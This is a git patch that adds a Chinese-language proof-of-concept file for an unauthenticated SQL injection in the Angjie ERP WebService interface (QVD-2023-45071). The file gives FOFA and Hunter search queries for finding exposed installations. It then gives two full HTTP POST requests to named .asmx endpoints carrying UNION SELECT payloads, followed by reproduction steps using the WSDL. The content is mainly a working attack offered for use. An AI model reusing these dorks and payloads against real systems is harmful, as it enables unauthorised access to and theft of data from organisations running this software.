From 54e9893c18fcc3127880a27fb7610c2c6cf8c503 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 24 Nov 2023 19:35:06 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=98=82=E6=8D=B7ERP=20WebService?= =?UTF-8?q?=E6=8E=A5=E5=8F=A3=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E(QV?= =?UTF-8?q?D-2023-45071).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ebService接口 SQL注入漏洞(QVD-2023-45071).md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md diff --git a/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md b/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md new file mode 100644 index 0000000..cd9ed16 --- /dev/null +++ b/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md @@ -0,0 +1,56 @@ +## 昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071) + 昂捷ERP WebService接口 存在SQL注入漏洞,未经身份验证的攻击者可以利用该漏洞泄露系统敏感信息。 + +## fofa +``` +body="CheckSilverlightInstalled" +``` + +## hunter +``` +web.body="CheckSilverlightInstalled" +``` + +## SQL注入点1 /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx +``` +POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1 +Host: xxx.xxx.xxx.xxx:8008 +Content-Type: text/xml; +charset=utf-8 +Content-Length: 482 + +SOAPAction: "http://tempuri.org/GetOSpById" +string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj +``` + +## SQL注入点2 /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx +``` +POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1 +Host: xxx.xxx.xxx.xxx:8008 +Content-Type: text/xml; +charset=utf-8 +Content-Length: 482 + +SOAPAction: "http://tempuri.org/GetOSpById" +string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj +``` + +## 漏洞复现 +访问漏洞点存在的地址 + +http://xxx.xxx.xxx.xxx:9012/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx + +在地址后面加上?wsdl + +http://xxx.xxx.xxx.xxx:8123/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx?wsdl + +![image](https://github.com/wy876/POC/assets/139549762/a0b95351-845e-49c5-ba1e-8831cf85df9e) + +使用wsdler拓展工具解析 + +![image](https://github.com/wy876/POC/assets/139549762/0537ac47-e89a-41fa-b925-cca83fba75ae) + +解析完成之后,即可对这些接口进行测试 + +![image](https://github.com/wy876/POC/assets/139549762/c1206032-8405-40e4-8ab4-69a68ee22d7f) +